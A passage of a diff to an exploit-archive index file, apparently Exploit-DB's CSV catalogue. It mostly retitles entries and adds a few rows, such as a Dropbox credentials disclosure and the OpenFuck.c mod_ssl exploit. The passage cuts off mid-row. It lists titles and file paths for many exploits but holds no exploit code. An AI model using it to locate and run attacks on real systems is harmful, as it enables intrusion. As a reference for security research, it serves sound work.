id,file,description,date,author,platform,type,port 18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0 18908,platforms/php/webapps/18908.txt,"Vanilla Forums LatestComment 1.1 Plugin - Persistent Cross-Site Scripting",2012-05-18,"Henry Hoggard",php,webapps,0 18915,platforms/windows/remote/18915.rb,"FlexNet License Server Manager - lmgrd Buffer Overflow",2012-05-23,Metasploit,windows,remote,0 -18922,platforms/php/webapps/18922.rb,"appRain CMF - Arbitrary PHP File Upload",2012-05-25,Metasploit,php,webapps,0 +18922,platforms/php/webapps/18922.rb,"appRain CMF - Arbitrary .PHP File Upload",2012-05-25,Metasploit,php,webapps,0 18916,platforms/windows/dos/18916.txt,"Symantec End Point Protection 11.x - & Symantec Network Access Control 11.x - LCE (PoC)",2012-05-23,41.w4r10r,windows,dos,0 18917,platforms/linux/local/18917.txt,"Apache - Mod_Auth_OpenID Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0 18918,platforms/multiple/dos/18918.txt,"Wireshark - DIAMETER Dissector Denial of Service",2012-05-24,Wireshark,multiple,dos,0 @@ -17378,7 +17377,7 @@ id,file,description,date,author,platform,type,port 20026,platforms/linux/dos/20026.c,"OpenLinux 2.3/2.4 / RedHat 6.0/6.1 / SCO eServer 2.3 - Denial of Service",1999-11-23,FuckGpm,linux,dos,0 20027,platforms/multiple/remote/20027.txt,"BEA Systems WebLogic Express 3.1.8/4/5 - Source Code Disclosure",2000-06-21,"Foundstone Inc.",multiple,remote,0 20028,platforms/windows/remote/20028.rb,"Simple Web Server - Connection Header Buffer Overflow",2012-07-23,Metasploit,windows,remote,0 -20029,platforms/php/webapps/20029.rb,"EGallery - PHP File Upload",2012-07-23,Metasploit,php,webapps,0 +20029,platforms/php/webapps/20029.rb,"EGallery - Arbitrary .PHP File Upload",2012-07-23,Metasploit,php,webapps,0 20030,platforms/unix/remote/20030.c,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,unix,remote,0 20031,platforms/linux/remote/20031.c,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0 20032,platforms/lin_x86/remote/20032.txt,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0 @@ -17410,7 +17409,7 @@ id,file,description,date,author,platform,type,port 20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String",2000-07-05,RaiSe,linux,remote,0 20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow",2000-07-02,UNYUN,linux,remote,0 20062,platforms/php/webapps/20062.py,"Alienvault OSSIM 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps,0 -20063,platforms/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Post-Authentication SQL Injection",2012-07-23,dookie,windows,webapps,0 +20063,platforms/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection",2012-07-23,dookie,windows,webapps,0 20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Root Remote Code Execution) Exploit",2012-07-24,muts,linux,remote,0 20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure",2000-07-08,"Andrew Lewis",windows,remote,0 20066,platforms/windows/remote/20066.java,"Michael Lamont Savant WebServer 2.1/3.0 - Buffer Overflow",2000-07-03,Wizdumb,windows,remote,0 @@ -17430,7 +17429,7 @@ id,file,description,date,author,platform,type,port 20080,platforms/windows/dos/20080.c,"Computer Software Manufaktur Alibaba 2.0 - Denial of Service",2000-07-18,wildcoyote,windows,dos,0 20081,platforms/windows/local/20081.c,"NetZero ZeroPort 3.0 - Weak Encryption Method",2000-07-18,"Brian Carrier",windows,local,0 20082,platforms/unix/remote/20082.txt,"University of Washington pop2d 4.46/4.51/4.54/4.55 - Remote File Read",2000-07-14,mandark,unix,remote,0 -20083,platforms/php/webapps/20083.txt,"WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0 +20083,platforms/php/webapps/20083.txt,"WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary .PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0 20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 - Piped Command",2000-07-18,Prizm,cgi,remote,0 20086,platforms/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 - 'webfind.exe' Buffer Overflow",2000-06-01,"Robert Horton",windows,remote,0 20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,php,webapps,0 @@ -17509,7 +17508,7 @@ id,file,description,date,author,platform,type,port 20170,platforms/php/webapps/20170.txt,"Joomla Movm Extension (com_movm) - SQL Injection",2012-08-01,D4NB4R,php,webapps,0 20171,platforms/php/webapps/20171.txt,"ManageEngine Application Manager 10 - Multiple Vulnerabilities",2012-08-01,Vulnerability-Lab,php,webapps,0 20172,platforms/php/webapps/20172.txt,"ManageEngine Mobile Application Manager 10 - SQL Injection",2012-08-01,Vulnerability-Lab,php,webapps,0 -20173,platforms/php/webapps/20173.rb,"WebPageTest - Arbitrary PHP File Upload",2012-08-02,Metasploit,php,webapps,0 +20173,platforms/php/webapps/20173.rb,"WebPageTest - Arbitrary .PHP File Upload",2012-08-02,Metasploit,php,webapps,0 20174,platforms/windows/remote/20174.rb,"Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow",2012-08-02,Metasploit,windows,remote,0 20175,platforms/windows/dos/20175.pl,"PragmaSys TelnetServer 2000 - rexec Buffer Overflow",2000-08-24,"Ussr Labs",windows,dos,0 20176,platforms/cgi/remote/20176.pl,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0 @@ -17997,7 +17996,7 @@ id,file,description,date,author,platform,type,port 20671,platforms/php/webapps/20671.html,"PG Portal Pro - Cross-Site Request Forgery",2012-08-20,Noxious,php,webapps,0 20672,platforms/php/webapps/20672.py,"Hivemail Webmail - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - (index.php id Parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0 -20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary PHP File Upload",2012-08-22,Metasploit,php,webapps,0 +20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary .PHP File Upload",2012-08-22,Metasploit,php,webapps,0 20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Persistent Cross-Site Scripting",2012-08-20,"Shai rod",php,webapps,0 20677,platforms/windows/webapps/20677.txt,"IOServer 1.0.18.0 - Directory Traversal",2012-08-20,hinge,windows,webapps,0 20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (1)",2001-03-08,anonymous,unix,local,0 @@ -18168,7 +18167,7 @@ id,file,description,date,author,platform,type,port 20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows - Kernel Intel x64 SYSRET (PoC)",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0 20862,platforms/php/webapps/20862.txt,"WordPress Count per Day Plugin 3.2.3 - Cross-Site Scripting",2012-08-27,Crim3R,php,webapps,0 20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - (products_name_de) Script Insertion",2012-08-27,LiquidWorm,php,webapps,0 -20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure File Upload",2012-08-27,"Sense of Security",asp,webapps,0 +20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload",2012-08-27,"Sense of Security",asp,webapps,0 20865,platforms/java/remote/20865.rb,"Java 7 Applet - Remote Code Execution",2012-08-27,Metasploit,java,remote,0 20866,platforms/php/webapps/20866.txt,"aoop CMS 0.3.6 - Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",php,webapps,0 20867,platforms/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client - asagent.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 @@ -18824,7 +18823,7 @@ id,file,description,date,author,platform,type,port 21543,platforms/java/webapps/21543.txt,"Ruslan Communications Builder - SQL Injection",2002-06-13,"Alexander Korchagin",java,webapps,0 21544,platforms/multiple/dos/21544.html,"Netscape 4.77 - Composer Font Face Field Buffer Overflow",2002-06-13,S[h]iff,multiple,dos,0 21545,platforms/jsp/webapps/21545.txt,"JAMF Casper Suite MDM - Cross-Site Request Forgery",2012-09-27,"Jacob Holcomb",jsp,webapps,0 -21546,platforms/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Post-Authentication Blind SQL Injection",2012-09-27,otoy,windows,webapps,0 +21546,platforms/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Authenticated Blind SQL Injection",2012-09-27,otoy,windows,webapps,0 21547,platforms/windows/local/21547.txt,"Smartfren Connex EC 1261-2 UI OUC - Privilege Escalation",2012-09-27,X-Cisadane,windows,local,0 21548,platforms/cfm/remote/21548.txt,"ColdFusion MX - Missing Template Cross-Site Scripting",2002-06-13,Macromedia,cfm,remote,0 21549,platforms/windows/local/21549.txt,"Microsoft SQL Server 2000 - Password Encrypt procedure Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0 @@ -18853,7 +18852,8 @@ id,file,description,date,author,platform,type,port 21572,platforms/multiple/dos/21572.txt,"Half-Life Server 1.1/3.1 - New Player Flood Denial of Service",2002-06-20,"Auriemma Luigi",multiple,dos,0 21573,platforms/cgi/webapps/21573.txt,"YaBB 1 - Invalid Topic Error Page Cross-Site Scripting",2002-06-21,methodic,cgi,webapps,0 21574,platforms/unix/remote/21574.txt,"Pirch IRC 98 Client - Malformed Link Buffer Overrun",2002-06-21,"David Rude II",unix,remote,0 -21575,platforms/multiple/dos/21575.txt,"Mod_SSL 2.8.x - Off-by-One HTAccess Buffer Overflow",2002-06-22,"Frank DENIS",multiple,dos,0 +21575,platforms/multiple/dos/21575.txt,"Apache/mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow",2002-06-22,"Frank DENIS",multiple,dos,0 +40348,platforms/windows/local/40348.py,"Dropbox Desktop Client 9.4.49 (64bit) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0 21576,platforms/windows/remote/21576.txt,"Working Resources BadBlue 1.7 - ext.dll Cross-Site Scripting",2002-06-23,"Matthew Murphy",windows,remote,0 21577,platforms/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 - Buffer Overflow",2002-11-06,watercloud,hp-ux,local,0 21578,platforms/unix/remote/21578.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (1)",2002-06-24,"Christophe Devine",unix,remote,0 @@ -18947,8 +18947,8 @@ id,file,description,date,author,platform,type,port 21668,platforms/php/webapps/21668.txt,"ShoutBox 1.2 - Form Field HTML Injection",2002-07-29,delusion,php,webapps,0 21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0 21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0 -21671,platforms/unix/remote/21671.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (1)",2002-07-30,spabam,unix,remote,0 -21672,platforms/unix/remote/21672.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (2)",2002-07-30,spabam,unix,remote,0 +21671,platforms/unix/remote/21671.c,"Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80 +40347,platforms/unix/remote/40347.txt,"Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit",2002-09-17,"Solar Eclipse",unix,remote,80 21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x - Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,windows,dos,0 21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0 21675,platforms/windows/remote/21675.pl,"Trillian 0.x - IRC Module Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0 @@ -19109,7 +19109,7 @@ id,file,description,date,author,platform,type,port 21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 - HTML Injection",2002-09-24,das@hush.com,php,webapps,0 21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - 'UNICODE' Null Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 21831,platforms/windows/local/21831.c,"PLIB 1.8.5 - ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0 -21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload",2012-10-10,Metasploit,php,webapps,0 +21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary .PHP File Upload",2012-10-10,Metasploit,php,webapps,0 21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet - Arbitrary File Upload",2012-10-10,Metasploit,linux,webapps,0 21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio - Arbitrary File Upload / Remote Code Execution",2012-10-10,Metasploit,windows,remote,4322 21838,platforms/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter - Buffer Overflow",2012-10-10,Metasploit,windows,remote,3217 @@ -19332,7 +19332,7 @@ id,file,description,date,author,platform,type,port 22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 - Format String",2002-12-04,"Thomas Wana",linux,local,0 22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local,0 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0 -22069,platforms/multiple/local/22069.py,"Oracle Database - Authentication Protocol Security Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 +22069,platforms/multiple/local/22069.py,"Oracle Database - Protocol Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps,0 22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 @@ -19760,9 +19760,9 @@ id,file,description,date,author,platform,type,port 22508,platforms/linux/dos/22508.sh,"Xinetd 2.1.x/2.3.x - Rejected Connection Memory Leakage Denial of Service",2003-04-18,"Steve Grubb",linux,dos,0 22509,platforms/multiple/remote/22509.txt,"Sophos Products - Multiple Vulnerabilities",2012-11-05,"Tavis Ormandy",multiple,remote,0 22511,platforms/windows/remote/22511.txt,"Working Resources 1.7.x/2.15 BadBlue - ext.dll Command Execution",2003-04-20,"Matthew Murphy",windows,remote,0 -22512,platforms/multiple/dos/22512.txt,"Mod_NTLM 0.x - Authorization Heap Overflow",2003-04-21,"Matthew Murphy",multiple,dos,0 +22512,platforms/multiple/dos/22512.txt,"Mod_NTLM 0.x - Authorisation Heap Overflow",2003-04-21,"Matthew Murphy",multiple,dos,0 22513,platforms/asp/webapps/22513.txt,"MPCSoftWeb 1.0 - Database Disclosure",2003-04-21,drG4njubas,asp,webapps,0 -22514,platforms/multiple/dos/22514.txt,"Mod_NTLM 0.x - Authorization Format String",2003-04-21,"Matthew Murphy",multiple,dos,0 +22514,platforms/multiple/dos/22514.txt,"Mod_NTLM 0.x - Authorisation Format String",2003-04-21,"Matthew Murphy",multiple,dos,0 22515,platforms/windows/remote/22515.txt,"AN HTTPD 1.x - Count.pl Directory Traversal",2003-04-22,"Matthew Murphy",windows,remote,0 22516,platforms/windows/dos/22516.pl,"Xeneo Web Server 2.2.9 - Denial of Service",2003-04-21,badpack3t,windows,dos,0 22517,platforms/php/webapps/22517.txt,"OpenBB 1.0/1.1 - 'index.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 @@ -19921,7 +19921,7 @@ id,file,description,date,author,platform,type,port 22672,platforms/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Inclusion",2003-05-29,pokleyzz,php,webapps,0 22673,platforms/asp/webapps/22673.txt,"philboard 1.14 - philboard_admin.asp Authentication Bypass",2003-05-29,aresu@bosen.net,asp,webapps,0 22674,platforms/windows/remote/22674.txt,"M-TECH P-Synch 6.2.5 - Full Path Disclosure",2003-05-29,JeiAr,windows,remote,0 -22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x - Authentication SQL Injection",2003-05-29,pokleyzz,php,webapps,0 +22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x - Authenticated SQL Injection",2003-05-29,pokleyzz,php,webapps,0 22676,platforms/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - Cross-Site Request Forgery / Remote Code Execution (Metasploit)",2012-11-13,"Ben Sheppard",windows,remote,0 @@ -20029,7 +20029,7 @@ id,file,description,date,author,platform,type,port 22784,platforms/windows/remote/22784.txt,"Microsoft Internet Explorer 5 - Custom HTTP Error HTML Injection",2003-06-17,"GreyMagic Software",windows,remote,0 22785,platforms/windows/remote/22785.txt,"MyServer 0.4.1/0.4.2 - HTTP Server Directory Traversal",2003-06-17,"Ziv Kamir",windows,remote,0 22786,platforms/linux/remote/22786.c,"Dune 0.6.7 - HTTP Get Remote Buffer Overrun",2003-06-17,V9,linux,remote,0 -22787,platforms/windows/remote/22787.rb,"NFR Agent FSFUI Record - Arbitrary File Upload Remote Code Execution",2012-11-19,Metasploit,windows,remote,0 +22787,platforms/windows/remote/22787.rb,"NFR Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution",2012-11-19,Metasploit,windows,remote,0 22788,platforms/windows/dos/22788.pl,"CesarFTP 0.99 g - Remote 'Username' Buffer Overrun",2003-03-30,dr_insane,windows,dos,0 22789,platforms/windows/dos/22789.pl,"CesarFTP 0.99 g - Remote CWD Denial of Service",2003-03-30,dr_insane,windows,dos,0 22790,platforms/windows/dos/22790.txt,"GuildFTPd 0.999.8 - CWD Command Denial of Service",2003-05-12,dr_insane,windows,dos,0 @@ -20169,7 +20169,7 @@ id,file,description,date,author,platform,type,port 22951,platforms/windows/remote/22951.html,"Opera 7.20 - Mail Client Policy Circumvention",2003-07-23,"Arve Bersvendsen",windows,remote,0 22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 - Unspecified Memory Disclosure",2003-07-23,V9,linux,dos,0 22953,platforms/php/webapps/22953.txt,"PHP-Gastebuch 1.60 - Information Disclosure",2003-07-24,"Jim Pangalos",php,webapps,0 -22955,platforms/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload and Execution",2003-07-24,"Martin Eiszner",php,webapps,0 +22955,platforms/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload / Execution",2003-07-24,"Martin Eiszner",php,webapps,0 22956,platforms/php/webapps/22956.txt,"e107 Website System 0.555 - db.php Information Disclosure",2003-07-24,"Artoor Petrovich",php,webapps,0 22957,platforms/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service",2003-07-23,refdom,windows,dos,0 22958,platforms/php/webapps/22958.txt,"e107 Website System 0.554 - HTML Injection",2003-07-25,"Pete Foster",php,webapps,0 @@ -20312,7 +20312,7 @@ id,file,description,date,author,platform,type,port 23078,platforms/linux/dos/23078.txt,"MySQL - Denial of Service (PoC)",2012-12-02,kingcope,linux,dos,0 23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0 23080,platforms/windows/remote/23080.txt,"FreeSSHD 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0 -23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Pre-Authentication User Enumeration",2012-12-02,kingcope,multiple,remote,0 +23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Unauthenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0 23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0 23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique)",2012-12-02,kingcope,windows,remote,0 23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 - Message Field HTML Injection",2003-09-01,Trash-80,php,webapps,0 @@ -20368,7 +20368,7 @@ id,file,description,date,author,platform,type,port 23137,platforms/multiple/remote/23137.txt,"Cacheflow CacheOS 4.1.10016 - HTTP HOST Proxy",2003-09-10,"Tim Kennedy",multiple,remote,0 23138,platforms/linux/dos/23138.txt,"MySQL 3.23.x/4.0.x - Password Handler Buffer Overflow",2003-09-10,"Frank DENIS",linux,dos,0 23139,platforms/windows/dos/23139.txt,"myServer 0.4.x - cgi-lib.dll Remote Buffer Overflow",2003-09-12,Moran,windows,dos,0 -23140,platforms/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 - Authentication SQL Injection",2003-09-12,frog,php,webapps,0 +23140,platforms/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 - Authenticated SQL Injection",2003-09-12,frog,php,webapps,0 23141,platforms/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' REMOTE_ADDR Authentication Bypass",2003-09-15,Texonet,sco,local,0 23142,platforms/multiple/dos/23142.txt,"WideChapter 3.0 - HTTP Request Buffer Overflow",2003-09-15,"Bahaa Naamneh",multiple,dos,0 23143,platforms/sco/local/23143.sh,"SCO OpenServer 5.0.x - 'mana' PATH_INFO Privilege Escalation",2003-09-15,Texonet,sco,local,0 @@ -20656,9 +20656,9 @@ id,file,description,date,author,platform,type,port 23432,platforms/cgi/webapps/23432.txt,"RemotelyAnywhere - Default.HTML Logout Message Injection",2003-12-11,"Oliver Karow",cgi,webapps,0 23433,platforms/multiple/remote/23433.txt,"Mozilla Browser 1.5 - URI MouseOver Obfuscation",2003-12-11,netmask,multiple,remote,0 23434,platforms/php/webapps/23434.pl,"osCommerce 2.2 - SQL Injection",2003-12-13,JeiAr,php,webapps,0 -23435,platforms/windows/remote/23435.c,"DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (1)",2003-12-16,Adik,windows,remote,0 -23436,platforms/windows/remote/23436.c,"DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (2)",2003-12-16,kralor,windows,remote,0 -23437,platforms/windows/remote/23437.c,"DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (3)",2003-12-16,kralor,windows,remote,0 +23435,platforms/windows/remote/23435.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (1)",2003-12-16,Adik,windows,remote,0 +23436,platforms/windows/remote/23436.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (2)",2003-12-16,kralor,windows,remote,0 +23437,platforms/windows/remote/23437.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (3)",2003-12-16,kralor,windows,remote,0 23438,platforms/linux/dos/23438.pl,"X-Chat 2.0.6 - Remote Denial of Service",2003-12-15,"Stefan Hecker",linux,dos,0 23439,platforms/multiple/remote/23439.txt,"MVDSV 0.165 b/0.171 Quake Server - Download Buffer Overrun",2003-12-15,"Oscar Linderholm",multiple,remote,0 23440,platforms/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,asp,webapps,0 @@ -20868,8 +20868,8 @@ id,file,description,date,author,platform,type,port 23648,platforms/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component - Remote Denial of Service",2004-02-04,"Peter Winter-Smith",windows,dos,0 23649,platforms/windows/remote/23649.rb,"Microsoft SQL Server - Database Link Crawling Command Execution",2012-12-25,Metasploit,windows,remote,0 23650,platforms/windows/remote/23650.rb,"IBM Lotus Notes Client URL Handler - Command Injection",2012-12-25,Metasploit,windows,remote,0 -23651,platforms/php/remote/23651.rb,"WordPress WP-Property Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0 -23652,platforms/php/remote/23652.rb,"WordPress Asset-Manager Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0 +23651,platforms/php/remote/23651.rb,"WordPress WP-Property Plugin - Arbitrary .PHP File Upload",2012-12-25,Metasploit,php,remote,0 +23652,platforms/php/remote/23652.rb,"WordPress Asset-Manager Plugin - Arbitrary .PHP File Upload",2012-12-25,Metasploit,php,remote,0 23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0 23654,platforms/windows/dos/23654.txt,"XLight FTP Server 1.x - Long Directory Request Remote Denial of Service",2004-02-05,intuit,windows,dos,0 23655,platforms/bsd/local/23655.txt,"BSD Kernel - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0 @@ -20941,7 +20941,7 @@ id,file,description,date,author,platform,type,port 23732,platforms/windows/remote/23732.c,"PSOProxy 0.91 - Remote Buffer Overflow (1)",2004-02-20,PaLbOsA,windows,remote,0 23733,platforms/windows/remote/23733.c,"PSOProxy 0.91 - Remote Buffer Overflow (2)",2004-02-20,Li0n7,windows,remote,0 23734,platforms/windows/remote/23734.c,"PSOProxy 0.91 - Remote Buffer Overflow (3)",2004-02-20,NoRpiuS,windows,remote,0 -23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Remote Post-Authentication Root Command Execution",2012-12-29,xistence,hardware,remote,0 +23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Remote Authenticated Root Command Execution",2012-12-29,xistence,hardware,remote,0 23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W - ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0 23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0 23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,linux,local,0 @@ -20956,7 +20956,7 @@ id,file,description,date,author,platform,type,port 23747,platforms/php/webapps/23747.txt,"XMB Forum 1.8 - BBcode align Tag Cross-Site Scripting",2004-02-23,"Janek Vind",php,webapps,0 23748,platforms/php/webapps/23748.txt,"XMB Forum 1.8 - forumdisplay.php Multiple Parameter SQL Injection",2004-02-23,"Janek Vind",php,webapps,0 23749,platforms/php/webapps/23749.txt,"LiveJournal 1.1 - CSS HTML Injection",2004-02-23,"Michael Scovetta",php,webapps,0 -23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Pre-Authentication Command Denial of Service",2004-02-24,"Zone-h Security Team",php,dos,0 +23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Unauthenticated Command Denial of Service",2004-02-24,"Zone-h Security Team",php,dos,0 23751,platforms/windows/remote/23751.txt,"Apache Cygwin 1.3.x/2.0.x - Directory Traversal",2004-02-24,"Jeremy Bae",windows,remote,0 23752,platforms/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service",2004-02-24,"Luigi Auriemma",windows,dos,0 23753,platforms/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 - 'PHPtest.php' Full Path Disclosure",2004-02-24,"Rafel Ivgi",php,webapps,0 @@ -20995,8 +20995,8 @@ id,file,description,date,author,platform,type,port 23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer - CButton Object Use-After-Free",2013-01-02,Metasploit,windows,remote,0 23786,platforms/hardware/dos/23786.c,"Nortel Wireless LAN Access Point 2200 Series - Denial of Service",2004-03-02,"Alex Hernandez",hardware,dos,0 23787,platforms/multiple/dos/23787.txt,"1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow",2004-03-02,JeFFOsZ,multiple,dos,0 -23788,platforms/hardware/dos/23788.pl,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (1)",2004-03-02,"Vasco Costa",hardware,dos,0 -23789,platforms/hardware/dos/23789.c,"SureCom EP-9510AX/EP-4504AX Network Device - 